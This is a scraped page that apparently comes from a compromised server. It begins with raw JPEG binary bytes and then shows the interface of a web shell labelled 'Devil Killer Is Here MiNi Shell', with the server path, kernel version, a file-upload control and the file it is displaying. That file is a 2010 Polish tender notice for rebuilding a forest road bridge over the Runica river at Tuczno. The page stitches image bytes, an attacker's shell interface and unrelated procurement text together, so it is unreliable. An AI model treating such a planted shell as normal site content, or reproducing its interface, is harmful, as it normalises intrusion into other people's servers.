JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24126-N-2010.html

<p class="kh_header"><b>Tuczno: Przebudowa mostu drogowego przez rzekę Runica 
wraz z modernizacją punktu czerpania wody dla celów p.poż.
 na drodze leśnej w Nadleśnictwie Tuczno.</b><br>
<b>Numer ogłoszenia: 24126 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Tuczno , ul. Klasztorna 36, 78-640 Tuczno, woj. zachodniopomorskie, tel. 067 2593147, faks 067 2593299.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pila.lasy.gov.pl/tuczno</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa mostu drogowego przez rzekę Runica 
wraz z modernizacją punktu czerpania wody dla celów p.poż.
 na drodze leśnej w Nadleśnictwie Tuczno..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy mostu drogowego na rzece Runica w km 4+350 w ciągu drogi leśnej w Leśnictwie Martew, zlokalizowanego na działkach 8174, 8193, 8194, 196/3 (obręb Martew - 41) oraz nr 8173 (obręb Tuczno - 110) wraz z modernizacją punktu czerpania wody do celów przeciwpożarowych.
Przebudowa mostu obejmować będzie rozbiórkę starej konstrukcji drewnianej pomostu i przyczółków oraz drewnianych pali nośnych i zastąpienie jej nową konstrukcją stalową - przepustem z rur karbowanych typu MP-150. Konstrukcja przepustu zabezpieczona antykorozyjnie w wytwórni powłoką cynku. 
Przepust, pozostałe części przelotowe przepustu oraz fundamenty wlotu i wylotu należy posadowić na fundamencie żwirowo - piaskowym o odpowiednim zagęszczeniu. Materiał zasypki przepustu - żwiry, piaski drobno i gruboziarniste - wbudowany równomiernie i odpowiednio zagęszczony.
Na wlocie i wylocie przepustu należy wykonać ściany żelbetowe z betonu B30, posadowione na żelbetowych fundamentach. 
Nad przepustem i na dojazdach do przepustu należy wykonać nawierzchnię jezdni o szerokości 4,0 m z gruzobetonu w obramowaniu z krawężnika betonowego.
W skład przebudowy wchodzi również wykonanie obustronnie poboczy długości 20,0 m i szerokości 0,5 m do bariery oraz 0,8 m za barierą sprężystą, która będzie zamontowana dla zabezpieczenia ruchu drogowego nad przepustem. Należy wykonać również obustronne skarpy nasypu drogowego o nachyleniu 1:1,50 i utwardzić je nad przepustem kostką brukową, bądź brukiem z kamienia polnego.
Celem poprawienia przepływu wody należy wyprofilować pobocza i dno rzeki, oczyścić koryto i umocnić dno oraz pobocza cieku narzutem kamiennym na długości po 5,0 m na wlocie i wylocie przepustu.
Dla ochrony p.poż. lasu na lewej stronie skarpy rzeki należy wykonać stanowisko dla pompy, oparte o betonową ścianę czołową przepustu. Punkt czerpania wody należy obramować palisadą z palików dębowych, zabitych na głębokość 1,4 m oraz utwardzić kostką bądź kamieniem polnym. Z drogi do punktu czerpania wody należy wykonać schody betonowe.
W rejonie prowadzonych robót nie występują żadne instalacje podziemne i naziemne uzbrojenia terenu.
Przed rozpoczęciem robót kierownik budowy opracuje i uzgodni Plan bezpieczeństwa i ochrony zdrowia (BIOZ) oraz Plan zapewnienia jakości dla realizacji budowy.
Planowana przebudowa mostu leży w obszarze chronionego krajobrazu -Puszcza nad Drawą- dlatego prace ziemne należy wykonać poza sezonem wegetacyjnym roślin, tj. z pominięciem okresu od 1 marca do 30 maja, w trakcie realizacji inwestycji nie wykorzystywać substancji, które mogłyby być letalne w stosunku do występujących roślin i zwierząt oraz po zakończeniu prac związanych z remontem mostu wodę rzeki należy obowiązkowo skierować do swojego naturalnego koryta i przywrócić jej naturalny charakter przyrodniczy do stanu przed rozpoczęciem inwestycji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.10-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium.
     Wysokość wadium ustala się w kwocie 2 000 złotych
     słownie: dziesięć tysięcy złotych. 
2.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego :
     Bank: PKO BP SA  o Wałcz, 
Nr rachunku : 58 1020 2847 0000 1102 0039 0948
z dopiskiem na blankiecie przelewu - wadium na zabezpieczenie oferty przetargowej - przebudowa mostu drogowego przez rzekę Runica. Kopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
3.	Wadium wnoszone w innej formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniu pieniężnym SKOK lub poręczeniach udzielanych przez podmioty,  o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, które należy w formie nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
    Z treści dokumentu powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne  
    żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie  
    gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych  
    w art. 46 ust. 4a i 5 ustawy Pzp.
     W treści gwarancji wadialnej muszą być dokonane następujące stwierdzenia :
1) nazwa i adres Zamawiającego,
2) określenie przedmiotu zamówienia,
3) nazwę i adres Wykonawcy, 
4) termin ważności.
4.	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 19.02.2010 r. do godziny 10 00.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone w pełnej kwocie na rachunku bankowym Zamawiającego. 
5.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania i w tym względzie są przedsiębiorcami w rozumieniu Art. 2 i Art. 4 ust. 1 i 2, prowadzącymi działalność gospodarczą zgodnie z art. 14 ust. 1 ustawy z dnia 02 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2007 r. Nr 155, poz. 1095 ze zmianami );
2)	posiadania wiedzy i doświadczenia w tym względzie :
a)   wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności, wykonali w sposób należyty roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. jednej roboty obejmującej budowę, przebudowę, rozbudowę obiektu kubaturowego o wartości nie mniejszej niż oferowana cena,
b)   Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji Wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie I niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy I doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia,
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia I w tym względzie :
a)    dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.:   
       osobami posiadającymi uprawnienia, kwalifikacje oraz doświadczenie niezbędne  
       do wykonania zamówienia; 
b)    kadra kierowania budową musi posiadać stwierdzenie przygotowania  
       zawodowego do wykonywania samodzielnych funkcji w budownictwie  
       (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego;
c)    dysponują lub będą dysponować narzędziami, wyposażeniem zakładu i  
       urządzeniami technicznymi niezbędnymi do realizacji zamówienia,
4)	sytuacji ekonomicznej i finansowej i w tym względzie :
a)    dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub  
       dostęp do kredytu w wysokości minimum 100.000 zł, 
           b)    posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;
5)	braku podstaw do wykluczenia w rozumieniu art. 24 ust. 1 ustawy P.z.p.;
6)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że :
a) każdy z osobna posiada uprawnienia do prowadzenia działalności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz że brak jest podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy P.z.p., 
b) wspólnie muszą wykazać, że spełniają warunki dotyczące wiedzy i doświadczenia, potencjału technicznego oraz dysponowania osobami zdolnymi do wykonania zamówienia, posiadania odpowiedniej wielkości środków finansowych niezbędnych do wykonania zamówienia, ubezpieczenia się w zakresie OC z tytułu prowadzenia działalności gospodarczej. 

2. Opis sposobu dokonywania oceny spełniania warunków.
1)   ocena spełnienia warunku dokonana będzie na podstawie załączonych przez   
      Wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikają informacje   
      potwierdzające spełnianie warunków. 
2)   ocena będzie dokonywana na zasadzie -spełnia - nie spełnia. 
3)   jeżeli wykonawca polega na wiedzy i doświadczeniu innego lub innych podmiotów,  
      niezależnie od charakteru prawnego łączącego go z nimi stosunku, zobowiązany  
      będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do  
      realizacji zamówienia, w szczególności przedstawi pisemne zobowiązanie i niezbędne  
      dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy I  
      doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia.
4)   jeżeli z uzasadnionych przyczyn wykonawca nie będzie mógł przedstawić wymaganych  
       przez Zamawiającego dokumentów dotyczących sytuacji finansowej, to będzie mógł  
       przedstawić inny dokument, który w wystarczający sposób potwierdzi spełniania tego  
       warunku.
5)    oświadczenia woli muszą być złożone w oryginale i podpisane przez osobę lub osoby     
       do tego uprawnione. 
6)    kopie dokumentów muszą być potwierdzone - za zgodność z oryginałem - przez   
       osobę do tego uprawnioną. 
7)    Wykonawca, który nie potwierdzi spełnienia warunków zostanie wykluczony z  
       postępowania, a jego oferta odrzucona. 
8)    pełnomocnictwo dla osób lub podmiotów uprawnionych do reprezentacji albo do    
       reprezentacji i zawarcia umowy musi być złożone w oryginale lub kopii potwierdzonej    
       przez notariusza. 
9)    pełnomocnictwo w formie pełnomocnictwa rodzajowego powinno dotyczyć  
       przedmiotowego postępowania i Zamawiającego. 
10)  z treści pełnomocnictwa powinien wynikać zakres umocowania. 

3.  Przesłanki wykluczenia Wykonawcy z postępowania.
1.  Z postępowania o udzielenie zamówienia wyklucza się: 
1)	Wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona orzeczeniem sądu, które uprawomocniło się w okresie 3 lat przed wszczęciem postępowania;
2)	Wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem Wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego;
3)	Wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku     z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione     w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary.
    2. Z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, którzy:
1)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi    w dokonywaniu tych czynności, chyba że udział tych Wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2)	nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3, albo nie zgodzili się na przedłużenie okresu związania ofertą;
3)	złożyli nieprawdziwe informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania;
4)	nie wykazali spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty i oświadczenia na potwierdzenie spełniania warunków udziału w postępowaniu i braku podstaw do wykluczenia z postępowania :
1.1	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, należy złożyć :
1)	oświadczenie o braku podstaw do wykluczenia;
2)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( dotyczy to wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego ), a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy,
3)	w przypadku Wykonawcy mającego siedzibę poza terytorium Rzeczypospolitej Polskiej, zaświadczenie właściwego organu administracyjnego albo organu gospodarczego z miejsca zamieszkania tych osób dotyczące prawa do wykonywania określonej działalności w zakresie jak określono w pkt. 2 );
1.2	W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ustawy, Zamawiający żąda złożenia następujących dokumentów:
a)  oświadczenie o spełnianiu warunków niezbędnych przy ubieganiu się o udzielenie  
     zamówienia publicznego na podstawie art. 22 ust. 1 pkt 1 - 4 ustawy P.z.p. (jeżeli   
     oferta jest składana wspólnie przez kilka podmiotów, oświadczenie takie powinno być  
     złożone, jako jedno i podpisane przez wszystkich partnerów lub ich pełnomocnika);
b)  wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  
     wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat licząc od dnia    
     złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z  
     podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenie  
     dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami  
     sztuki budowlanej i prawidłowo ukończone;
c)  oświadczenie o dysponowaniu lub możliwości dysponowania narzędziami,  
     wyposażeniem zakładu i urządzeniami technicznymi dostępnymi dla Wykonawcy w  
     celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi  
     zasobami;
d)  wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od  
     tego, czy są one zatrudnione bezpośrednio przez Wykonawcę, w szczególności  
     odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat  
     ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla  
     wykonania zamówienia, a także zakresu wykonywanych przez nie czynności;
e)  oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia,   
     posiadają wymagane uprawnienia do wykonywania samodzielnych funkcji w  
     budownictwie;
f)   informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których  
     wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków  
     finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 
     miesiące przed upływem terminu składania ofert;
g)  opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że  
     Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
     działalności związanej z przedmiotem zamówienia.
1.3	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest do wykazania za pomocą dokumentów wymienionych w pkt. 1, że w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia.
1.4	Jeżeli Wykonawca, wykazując spełnianie warunku, o którym mowa w rozdz. V pkt. 1 ppkt. 4 lit. a, polega na zdolnościach finansowych innych podmiotów, zobowiązany będzie do przedłożenia informacji, o której mowa w pkt. 6, dotyczącej tych podmiotów.
1.5	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt. 1.3, kopie dokumentów dotyczących każdego z tych podmiotów mają być poświadczane za zgodność z oryginałem przez te podmioty.

2. Dokumenty składające się na ofertę:
1)	Wypełniony i podpisany formularz -OFERTA (wzór - załącznik nr 1 do niniejszej SIWZ).
    Oświadczenia Wykonawcy o:
          a) dokonaniu wizji lokalnej w terenie, gdzie będą wykonywane roboty budowlane, z   
              podaniem terminu dokonanych oględzin obiektu,
          b) zapoznaniu się I zaakceptowaniu niniejszej SIWZ,
          c) zapoznaniu się i zaakceptowaniu wzoru umowy wraz z dokumentem gwarancyjnym    
              (wzór - załącznik nr 6 do niniejszej SIWZ),
d) udzieleniu na wykonany przedmiot zamówienia gwarancji na okres 36 miesięcy licząc od daty odbioru końcowego, a odpowiedzialność z tytułu rękojmi zostaje rozszerzona na okres obowiązywania gwarancji,
    e) zaakceptowaniu warunków rozliczenia i terminu zapłaty określonych w rozdziale III  
        pkt. 2,
    f) dostarczeniu na teren budowy sprzętu i materiałów na własne ryzyko,
   g) uporządkowaniu terenu po zakończeniu robót,
   h) sporządzeniu dokumentacji powykonawczej,
   i ) wykonaniu robót budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury z  
       dnia 27 sierpnia 2002r. w sprawie szczegółowego zakresu i formy planu  
       bezpieczeństwa i ochrony zdrowia oraz szczegółowego zakresu rodzaju robót  
       budowlanych , stwarzających zagrożenia bezpieczeństwa i zdrowia ludzi (Dz. U. z 
       2002r. Nr 151 poz. 1256),
   j ) potwierdzeniu terminu wykonania przedmiotu zamówienia,
   k) potwierdzenie okresu związania się niniejszą ofertą,
   l ) formie wniesienia wadium,
   ł ) zobowiązaniu się do wysokości i formy wniesienia zabezpieczenia należytego  
       wykonania umowy. 
2)	W celu stwierdzenia, czy osoba podpisująca oświadczenia woli lub udzielająca pełnomocnictwa posiada do tego uprawnienia, do oferty należy załączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3)	W przypadku Wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 
4)	Kopia dowodu wniesienia wadium.
5)	Harmonogram rzeczowo - finansowy realizacji i rozliczania wykonanych robot opracowany według wytycznych określonych w rozdz. III pkt. 2.
6)	Kosztorys ofertowy opracowany metodą uproszczoną wraz z zestawieniem cen jednostkowych materiałów, czynników produkcji tj. stawka rbh, kosztów pośrednich, kosztów zaopatrzenia i zysku oraz stawki jednostkowej pracy podstawowego sprzętu i urządzeń, które Wykonawca będzie używał do wykonania przedmiotu zamówienia.

Uwaga 
Z uwagi na formę wynagrodzenia ryczałtowego kosztorys ofertowy nie będzie podlegać ocenie. Kosztorys ofertowy będzie niezbędny do rozliczenia się z Wykonawcą w sytuacji, jeżeli powstaną okoliczności wykonania nieprzewidzianych robót zamiennych lub będzie konieczność zaniechania części robót.
7)	Wykaz części zamówienia, które Wykonawca zamierza zlecić do wykonania Podwykonawcom.
